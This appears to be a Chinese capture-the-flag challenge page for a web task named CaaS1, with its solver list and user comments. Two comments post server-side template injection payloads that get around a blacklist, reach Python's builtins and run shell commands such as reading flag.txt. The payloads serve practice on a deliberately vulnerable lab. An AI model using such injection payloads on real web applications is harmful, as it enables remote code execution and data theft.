CaaS1WEB 未解决
分数:
40
金币:
4
题目作者:
Aman
一 血:
Paradiso
一血奖励:
4金币
解 决:
131
提 示:
描 述:
CaaS1
其 他:
server.zip
评分(1)
解题动态
sjjf 攻破了该题 8天前
WindZQ 攻破了该题 13天前
南京交通第一深情徐立超 攻破了该题 17天前
seyana 攻破了该题 17天前
SkyAsh 攻破了该题 24天前
nihaolmb 攻破了该题 1月前
pigpigG6768 攻破了该题 1月前
20230302203 攻破了该题 1月前
刘德龙 攻破了该题 1月前
叶子璐 攻破了该题 1月前
农群丹 攻破了该题 1月前
杨荣涛 攻破了该题 1月前
05su 攻破了该题 1月前
xz6666 攻破了该题 1月前
螺蛳粉 攻破了该题 1月前
金典 攻破了该题 1月前
特仑苏 攻破了该题 1月前
韦东妙 攻破了该题 1月前
陆美宏 攻破了该题 1月前
评论
李逍遥逛霍格沃茨 7天前
举报
又一个坑金币的垃圾题目 买了write up也不行 hackbar和BP全试了 不是黑名单就是500错误
李逍遥逛霍格沃茨 7天前
举报
又一个坑金币的垃圾题目 买了write up也不行 hackbar和BP全试了 不是黑名单就是500错误
124要留就要77 8月前
举报
name={{g.pop["__global""s__"].__builtins__.eval(request.form.team_name)}}&team_name=__import__("os").popen("cat flag.txt").read() 直接获取flag
baozongwi 1年前
举报
会不会出题大哥,这黑名单里面有[]为什么这样子还能过 name={{g.pop["__global""s__"].__builtins__.eval(request.args.x)}}&team_name=g 怎么回事
网络小钦 1年前
举报
看不懂啊
2552758573 1年前
举报
payload太长了,绕不过去
无法释怀的遗憾en 2年前
举报
这个题什么意思
无法释怀的遗憾en 1年前
举报
@cgxx 懂了 好玩这个题
cgxx 2年前
举报
模板注入